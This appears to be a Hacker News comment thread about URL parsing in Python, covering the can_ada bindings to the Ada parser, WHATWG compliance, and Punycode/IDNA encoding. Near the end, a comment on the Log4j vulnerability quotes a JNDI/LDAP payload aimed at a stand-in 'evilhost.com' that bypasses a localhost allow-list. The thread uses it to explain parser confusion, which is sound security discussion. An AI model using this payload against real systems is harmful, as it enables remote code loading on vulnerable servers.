Parsing URLs in Python
tkte.ch
tkte.ch
We need a better URL parser in Scrapy, for similar reasons. Speed and WHATWG standard compliance (i.e. do the same as web browsers) are the main things.
It's possible to get closer to WHATWG behavior by using urllib and some hacks. This is what https://github.com/scrapy/w3lib does, which Scrapy currently uses. But it's still not quite compliant.
Also, surprisingly, on some crawls URL parsing can take CPU amounts similar to HTML parsing.
Ada / can_ada look very promising!
Google failed on the second part.
It's interesting because I just went down an apparent rabbit hole inplementing Byte-level encoding for using language models with unicode. There each byte in a unicode character is mapped to a printable character that goes up to 255 < ord(x) < 511 (I don't remember the highest but the point is each byte is mapped to another printable unicode character.
See https://github.com/openai/gpt-2/blob/9b63575ef42771a015060c9...
And the actual list of characters:
https://github.com/rbitr/llm.f90/blob/dev/phi2/phi2/pretoken...
See https://en.wikipedia.org/wiki/Punycode#Encoding_the_non-ASCI...
I was wondering, can that clash with a "normal" domain registered as "xn--....."? Apparently there is another specific rule in RFC 5891 saying "The Unicode string MUST NOT contain "--" (two consecutive hyphens) in the third and fourth character positions" [0]
Also, if I was forced to represent Unicode as ASCII, punycode encoding is not the obvious one - it's pretty confusing. But, I don't know much about how and why it was chosen, so I assume there's good reason.
[0] https://datatracker.ietf.org/doc/html/rfc5891#section-4.2.3....
Actually, I wonder what happens if you take a "normal" (i.e. non-IDN, ascii-only) domain and encode it as Punycode. Should the encoded and non-encoded domains be considered identical or separate? (for purposes of DNS resolutions, origin separation, etc)
Identical would be more intuitive and would match the behavior of domain names with non-ascii characters - on the other hand, this would require reworking of ALL non-punycode-aware DNS software, which I'm doubtful is possible.
So this seems like a tricky thing to get right.
>>> "foo".encode("idna")
b'foo'
>>> "fooé".encode("idna")
b'xn--foo-dma'
So indeed a punycode'd ascii domain would remain unchanges by the looks of it.There's also the "punycode" encoding available, but that does something subtly different that's not quite how domains get encoded:
>>> "foo".encode("punycode")
b'foo-'
>>> "fooé".encode("punycode")
b'foo-dma'https://docs.python.org/3.12/library/codecs.html#module-enco...
The recommend the 3rd party 'idna' module for this:
https://pypi.org/project/idna/
IDNA 2003 is a particular annoyance of mine: The IDNA 2003 algorithm didn't encode the german 'ß' character, or rather 'wrongly', through overeager use of Unicode normalisation in the nameprep part. Then the browser makers for a long time stood still and didn't upgrade to IDNA 2008, which fixed that bug among other things. The WhatWG in its self-appointed role as stenograph of the browser cartel didn't change its weird URL spec. But that seems to have changed in recent years. Of course the original sin of IDNA was making it client-side. :/
In this case, Gemini correctly points to Punycode
(It's not even a real standard -- it's a "living standard", which means it just changes randomly and there's no way to actually say "yes, you're compliant with that".)
As for your claim about living standards, I'd encourage you to read https://whatwg.org/faq#living-standard
They seem to be making reference to things like the RFC system, but those get updated too.
I'll also throw in that I've recently wrote bindings to Mozilla's servo URL library.
Those live at https://github.com/crate-py/url
They're not complete yet (meaning only the parsing bits are exposed, not URL modification) but I too was frustrated with the state of URL parsing.
https://github.com/servo/rust-url/issues/864#issuecomment-16...
- resolving "../" may have security implications - unicode hostname seems more readable. To get punycode, one can call .encode("idna") if necessary.
How often parsing urls is a performance bottleneck?
Boom, you have now parsed a URL.
Wanna parse an http query params into host,port, resource? Speak appropriately, ask how to parse an http request, wanna parse a resource? Get into those semantics, be precise
Calling this Ada is just ridiculous.
I can’t believe Amazon wasn’t violating some anti-competition rule by using “AWS” for “Amazon Web Services” when it already meant “Ada Web Server.”
Wow when I search for “Ada GPS” I get global position system support libraries before GNAT Programming Studio.
Inkscape or Krita have less poignant, but more reasonable name. (But yes, such an approach removes some of the teenage fun from doing a project.)
Just like the ~20 other projects named Ada.
Why would you do that, Daniel?
The odds that any other parser uses the same broken semantics are basically nil.
It's also
1. not a solo dev
2. Daniel Lemire
3. a serious engineering and research effort: https://arxiv.org/pdf/2311.10533.pdf
I guess you are right that there are 2 commits from a different dev, so it is technically not a solo project. I still wouldn't ever use this in production code.
But it appears that they've just exported the meat of the Ada project and left everything else upstream.
can_ada is just the python bindings.
The actual underlying project is at https://github.com/ada-url/ada
can_ada is simply a 60-line glue and packaging making it available with low overhead to Python.
Despite my snarky comments, thank you for contributing to the python ecosystem, this does seem like a cool project for high performance URL parsing!
That’s the perverse nature of “wrong but ubiquitous” parsers: unless you’re confident that your replacement is complete, you can make the situation worse, not better.
And that any 3rd party libs you use also don't ever call the stdlib parser internally because you do not want to debug why a URL works through some code paths but not others.
Turns out that url parsing is a cross-cutting concern like logging where libs should defer to the calling code's implementation but the Python devs couldn't have known that when this module was written.
rfc3986 may reject URLs which browsers accept, or it can handle them in a different way. WHATWG URL living standard tries to put on paper the real browser behavior, so it's a much better standard if you need to parse URLs extracted from real-world web pages.
I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:
https://claroty.com/team82/research/exploiting-url-parsing-c...
Paper here:
https://web-assets.claroty.com/exploiting-url-parsing-confus...
If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.
I don't think that's a fair description of the issue.
The log4j vulnerability was that it specifically added JNDI support (https://issues.apache.org/jira/browse/LOG4J2-313) to property substitution (https://logging.apache.org/log4j/2.x/manual/configuration.ht...), which it would apply on logged messages. So it was a pretty literal feature of log4j. log4j would just pass the URL to JNDI for resolution, and substitute the result.
jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.I retract my criticism if this project is just for fun.
Edit: downvoters, do you disagree?
Edit2: OK, I may have judged a bit prematurely. Ada itself has fuzzers and tests. They're just not exported to the can_ada project.
I didn't understand that can_ada is not where the parser is developed.
Of course there is always room for new projects, but it still feels weird to act as if this is the first time anybody has ever tried this. It seems like a lot of people are under this same mistaken impression, at least according to the sample of HN users who commented in this thread.